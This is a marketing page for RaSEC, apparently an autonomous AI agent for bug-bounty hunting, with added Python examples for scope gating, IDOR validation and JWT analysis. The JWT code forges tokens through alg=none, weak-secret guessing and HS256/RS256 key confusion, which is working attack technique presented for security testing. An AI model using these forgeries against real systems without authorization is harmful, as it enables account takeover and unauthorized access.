The agent that hunts while you sleep.
RaSEC is a fully autonomous AI agent. It discovers endpoints, tests authorization patterns, validates findings deterministically, and delivers copy-paste-submit PoC reports by morning.
Capabilities
Built for serious hunters
Four core systems work together: autonomous hunting, zero-noise validation, real-time steering, and persistent memory.
Overnight Autonomous Hunting
Define your scope, hit start, go to sleep. By morning, RaSEC has crawled endpoints, tested authorization patterns, and validated every finding with deterministic reproduction.
- IDOR, auth bypass, access control bugs
- Prompt injection, race conditions (Elite)
- Scope-safe — no action leaves your boundary
Agent Workflow
- Scope load → boundary enforcement
- Endpoint crawl → auth flow extraction
- Vulnerability test → evidence collection
- Repro attempt → deterministic validation
- PoC report → copy-paste-submit
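The "scope load → boundary enforcement" step above is the one that decides whether anything else is allowed to run. The block below is an added example of such a gate, not RaSEC's own code: the scope format (host globs, excluded hosts, excluded path prefixes), the `transport` interface and the fake responses are all assumptions made for illustration. It also shows the case a naive scope check misses: an in-scope host answering with a redirect to an out-of-scope one.

```python
"""Scope gate checked before every outbound request.

Added example, not RaSEC's own code. The scope format (host globs, excluded
hosts, excluded path prefixes) and the transport interface are assumptions;
the page does not document RaSEC's internal formats. The fake transport and
its responses are constructed sample data.
"""
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from urllib.parse import urljoin, urlsplit

REDIRECTS = {301, 302, 303, 307, 308}


@dataclass
class Scope:
    hosts: set = field(default_factory=set)            # allowed host globs, e.g. "*.example.com"
    excluded_hosts: set = field(default_factory=set)   # always refused, even if a glob matches
    excluded_paths: set = field(default_factory=set)   # path prefixes that are never requested

    def add_target(self, host: str) -> None:
        """Mid-hunt scope extension (what an `add_target` steer command would do)."""
        self.hosts.add(host.lower())

    @staticmethod
    def _matches(host: str, patterns: set) -> bool:
        # "*.example.com" covers subdomains only; the apex must be listed explicitly.
        return any(fnmatchcase(host, p.lower()) for p in patterns)

    def allows(self, url: str) -> bool:
        """True only if scheme, host and path are all inside the boundary."""
        parts = urlsplit(url)
        # urlsplit().hostname drops userinfo, so "https://api.example.com@evil.net/" resolves to evil.net.
        host = (parts.hostname or "").lower()
        if parts.scheme not in ("http", "https") or not host:
            return False
        if self._matches(host, self.excluded_hosts) or not self._matches(host, self.hosts):
            return False
        path = parts.path or "/"
        return not any(path.startswith(p) for p in self.excluded_paths)


@dataclass
class GateResult:
    sent: bool            # False means the gate refused to send
    final_url: str
    status: int = 0
    body: bytes = b""
    reason: str = ""


def gated_send(scope: Scope, method: str, url: str, transport, max_redirects: int = 5) -> GateResult:
    """Send only in-scope requests; follow redirects by hand so a 302 cannot drag the agent out of scope."""
    for _ in range(max_redirects + 1):
        if not scope.allows(url):
            return GateResult(False, url, reason="outside scope; request not sent")
        status, headers, body = transport(method, url)
        location = headers.get("Location")
        if status in REDIRECTS and location:
            url = urljoin(url, location)   # re-checked by the gate on the next iteration
            continue
        return GateResult(True, url, status, body)
    return GateResult(False, url, reason="too many redirects")


# Constructed stand-in for a live target (no network involved).
FAKE_RESPONSES = {
    ("GET", "https://api.example.com/api/v2/users/1"): (200, {}, b'{"id":1,"email":"alice@example.com"}'),
    ("GET", "https://api.example.com/legacy"): (302, {"Location": "https://evil.net/collect"}, b""),
    ("GET", "https://api.example.com/moved"): (301, {"Location": "/api/v2/users/1"}, b""),
}


def fake_transport(method: str, url: str):
    return FAKE_RESPONSES.get((method, url), (404, {}, b""))


if __name__ == "__main__":
    scope = Scope(hosts={"*.example.com"}, excluded_hosts={"prod-db.example.com"},
                  excluded_paths={"/admin/delete"})
    for path in ("/api/v2/users/1", "/legacy", "/moved"):
        r = gated_send(scope, "GET", "https://api.example.com" + path, fake_transport)
        print(path, "->", "sent" if r.sent else "BLOCKED", r.final_url, r.reason)
```

The gate re-runs on every hop rather than once per request, which is what keeps a redirect, a `Location` header pointing at a relative path, or a userinfo-prefixed URL from quietly widening the boundary.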
Zero-Noise Validation
Every HIGH/CRIT finding passes deterministic reproduction before it reaches you. Findings move through explicit lifecycle states (Pending, then Validated or Rejected), not confidence scores.
- No heuristic guesses or AI hallucinations
- Curl-reproducible evidence for every finding
- Baseline diff proves the vulnerability is real
Finding Lifecycle
- Discovery → signal detected
- Triage → severity classification
- Reproduction → deterministic proof
- Validation → confirmed or rejected
- Report → formatted for submission
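What "deterministic reproduction" and "baseline diff" mean in practice for the page's headline bug class, IDOR, is shown in the added example below. It is not RaSEC's code: the finding shape, the state names and the transport signature are assumptions, and the in-memory API is a constructed stand-in with one vulnerable route and one correctly authorized route so that both lifecycle outcomes are exercised.

```python
"""Deterministic IDOR validation by baseline diff.

Added example, not RaSEC's own code. The finding shape, lifecycle state names
and transport signature are assumptions, and the in-memory API below is a
constructed stand-in for a real target: /api/v2/users/{id} leaks any record to
any authenticated caller, while /api/v3/users/{id} enforces ownership.
"""
import json
from dataclasses import dataclass, field

# --- constructed target (two of the hunter's own accounts, no third-party data) ---
TOKENS = {"tok-alice": 1, "tok-bob": 2}
USERS = {
    1: {"id": 1, "email": "alice@example.com", "ssn_last4": "1234"},
    2: {"id": 2, "email": "bob@example.com", "ssn_last4": "9876"},
}


def fake_api(method: str, path: str, token: str):
    """transport(method, path, bearer_token) -> (status, body_bytes)."""
    caller = TOKENS.get(token)
    if caller is None:
        return 401, b'{"error":"unauthenticated"}'
    for prefix, enforce_owner in (("/api/v2/users/", False), ("/api/v3/users/", True)):
        if method == "GET" and path.startswith(prefix) and path[len(prefix):].isdigit():
            uid = int(path[len(prefix):])
            if uid not in USERS:
                return 404, b'{"error":"not found"}'
            if enforce_owner and uid != caller:
                return 403, b'{"error":"forbidden"}'
            return 200, json.dumps(USERS[uid]).encode()
    return 404, b'{"error":"no route"}'


@dataclass
class Finding:
    method: str
    victim_path: str      # resource owned by account A
    control_path: str     # the same resource type owned by account B
    victim_token: str     # account A's session
    attacker_token: str   # account B's session
    state: str = "Pending"
    evidence: dict = field(default_factory=dict)


def curl_for(f: Finding, base_url: str = "https://api.example.com") -> str:
    """Copy-paste reproduction line for the report (base_url is a placeholder)."""
    return (f"curl -s -X {f.method} -H 'Authorization: Bearer {f.attacker_token}' "
            f"'{base_url}{f.victim_path}'")


def validate_idor(f: Finding, transport, runs: int = 3) -> Finding:
    """Move a Pending IDOR finding to Validated or Rejected.

    Validated requires, on every one of `runs` replays:
      1. owner baseline: GET victim_path as A returns 200;
      2. attacker view : GET victim_path as B returns 200 with the same JSON body as the baseline;
      3. control diff  : B's view of victim_path differs from B's own resource, so the endpoint
         really returned A's data rather than public or caller-relative data.
    Any miss on any replay is a Rejected, not a lowered confidence score.
    """
    status, baseline = transport(f.method, f.victim_path, f.victim_token)
    if status != 200:
        f.state, f.evidence = "Rejected", {"reason": f"owner baseline returned {status}"}
        return f
    status, control = transport(f.method, f.control_path, f.attacker_token)
    if status != 200:
        f.state, f.evidence = "Rejected", {"reason": f"control request returned {status}"}
        return f
    for i in range(1, runs + 1):
        status, attacker_view = transport(f.method, f.victim_path, f.attacker_token)
        if status != 200 or json.loads(attacker_view) != json.loads(baseline):
            f.state = "Rejected"
            f.evidence = {"reason": f"replay {i}: attacker got {status} or a body that differs from baseline"}
            return f
        if json.loads(attacker_view) == json.loads(control):
            f.state = "Rejected"
            f.evidence = {"reason": f"replay {i}: response identical to attacker's own resource"}
            return f
    f.state = "Validated"
    f.evidence = {"baseline": baseline.decode(), "attacker_view": attacker_view.decode(),
                  "replays": runs, "curl": curl_for(f)}
    return f


if __name__ == "__main__":
    for path_version in ("v2", "v3"):
        f = Finding("GET", f"/api/{path_version}/users/1", f"/api/{path_version}/users/2",
                    "tok-alice", "tok-bob")
        validate_idor(f, fake_api)
        print(f.victim_path, f.state, f.evidence.get("curl") or f.evidence.get("reason"))
```

The control request is the part hunters most often skip: without it, an endpoint that returns the caller's own record regardless of the `{id}` in the path, or one that returns only public fields, would look like an IDOR on a status-code comparison alone.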
Co-Pilot Steer Mode
You steer. It hunts. Redirect the agent mid-hunt, skip noisy paths, focus on a specific endpoint. Full operator control in real time.
- Focus: direct agent to specific endpoint
- Skip: deprioritize noisy paths
- Stop: halt execution once the current agent step completes
- Add target: inject new scope mid-hunt
Steer Commands
- → focus /api/v2/users/*
- → skip subdomain-finder
- → add_target api.staging.corp
- ← Agent redirected. Hunting /api/v2/users/*
- ← Found IDOR on GET /api/v2/users/{id}
Persistent Memory + RAG
The agent remembers. Past findings on the same target are recalled automatically. Elite tier adds semantic vector search across all hunts. No duplicate submissions, no re-testing known endpoints.
- Keyword recall: same target (Pro)
- Semantic RAG across all hunts (Elite)
- Automatic deduplication before report
Memory System
- Hunt #1: Found IDOR on /api/users/
- Hunt #2: Recalled finding → skipped
- Hunt #3: New endpoint /api/v3/admin/
- Hunt #3: Cross-referenced memory → novel
- Hunt #3: Validated → new PoC generated
Side-by-side
RaSEC vs the alternatives
| Capability | RaSEC Hunt | Burp Suite | Manual testing |
|---|---|---|---|
| Scope enforcement | Scope check before every action | Scope config (easy to mis-run) | Rely on hunter discipline |
| Validation stance | Deterministic reproduction required | Raw findings — triage on you | Manual verification needed |
| PoC reports | Copy-paste-submit (H1/Bugcrowd) | Manual write-up required | Manual write-up required |
| Overnight runs | 3-5 concurrent sessions | Manual operation | Manual operation |
| Duplicate avoidance | Memory-based deduplication | No memory | Hunter memory only |
| Live mission log | Streaming plan + event log | Terminal streams only | Hunter notes only |
| Cost | $0 — $99/mo | $449/year | Your time |
Included free
8 security tools, no login
Use them standalone or let the hunt agent chain them together automatically.
URL Analysis
Find open redirects, SSRF indicators, and injection points in any URL.
Code Analysis
Scan source code for hardcoded secrets, insecure patterns, and injection sinks.
Subdomain Finder
Enumerate subdomains via DNS records, certificate transparency logs, and brute-force.
URL Finder
Discover hidden endpoints, admin paths, and API routes from any web application.
JS Recon
Extract API keys, internal endpoints, and auth tokens from JavaScript files.
Security Headers
Inspect HTTP security headers and detect missing CSP, HSTS, and clickjacking protections.
JWT Analyzer
Decode JWTs and test for algorithm confusion, weak secrets, and common exploits.
Payload Forge
Generate context-aware XSS, SQLi, SSRF, and SSTI payloads for security testing.
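The JWT Analyzer entry names three checks (decoding, algorithm confusion, weak secrets). The block below is an added example of those checks using only the Python standard library; it is not RaSEC's analyzer. Because there is no RSA code in the standard library, the key-confusion part builds the forged HS256 token for the reader to submit to the target rather than verifying an RS256 signature itself. The wordlist and the public-key text are constructed sample data, and the PEM is a placeholder, not a real key.

```python
"""JWT checks: decode, alg=none detection, weak HS256 secret guessing, and the
HS256/RS256 key-confusion probe.

Added example, not RaSEC's own JWT Analyzer. Only the standard library is used,
so RS256 signatures are not verified here; the probe builds the forged token and
the reader submits it to the target. The wordlist and the public-key text are
constructed sample data (the PEM is a placeholder, not a real key).
"""
import base64
import hashlib
import hmac
import json

# Placeholder standing in for the target's RSA public key. In a real probe the
# bytes must be exactly what the server loads (including the trailing newline),
# because the forged HMAC is computed over those bytes.
SAMPLE_PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_jwt(token: str):
    """Header and payload are only base64url-encoded JSON; reading them needs no key."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), b64url_decode(sig_b64)


def _compact(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def forge_hs256(payload: dict, key: bytes) -> str:
    """Sign arbitrary claims with HS256 under `key`."""
    signing_input = f"{_compact({'alg': 'HS256', 'typ': 'JWT'})}.{_compact(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none(payload: dict) -> str:
    """Unsigned token; a server that honours alg=none accepts any claims."""
    return f"{_compact({'alg': 'none', 'typ': 'JWT'})}.{_compact(payload)}."


def key_confusion_probe(rs256_token: str, public_key_pem: bytes) -> str:
    """Re-sign an RS256 token's claims with HS256, using the server's *public* key as the HMAC secret.

    A verifier that trusts the header's alg and hands its RSA public key to HMAC
    accepts this token, since the public key is not secret. Submit the result to
    the target; acceptance (a 200 instead of a 401) confirms the confusion."""
    _, payload, _ = decode_jwt(rs256_token)
    return forge_hs256(payload, public_key_pem)


def analyze(token: str, wordlist) -> list:
    """Return the findings a hunter would act on for this token."""
    header, payload, sig = decode_jwt(token)
    findings = []
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":            # also catches "None" / "NONE" variants
        findings.append("alg=none: token carries no signature")
    if alg.upper() == "HS256":
        signing_input = token.rsplit(".", 1)[0].encode()
        for secret in wordlist:
            guess = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(guess, sig):
                findings.append(f"HS256 secret found in wordlist: {secret!r}")
                break
    if "exp" not in payload:
        findings.append("no exp claim: token never expires")
    return findings


if __name__ == "__main__":
    weak = forge_hs256({"sub": "alice", "role": "user"}, b"secret")
    print(analyze(weak, ["password", "secret", "changeme"]))
    # Constructed RS256-shaped token: header says RS256, signature bytes are dummy.
    rs = f"{_compact({'alg': 'RS256', 'typ': 'JWT'})}.{_compact({'sub': 'alice'})}.{b64url_encode(b'dummy')}"
    print(key_confusion_probe(rs, SAMPLE_PUBLIC_KEY_PEM))
```

Two practical caveats the code comments repeat: the wordlist check only catches secrets in the list, so a clean result is not proof of a strong key, and the confusion probe is evidence only once the target accepts the forged token.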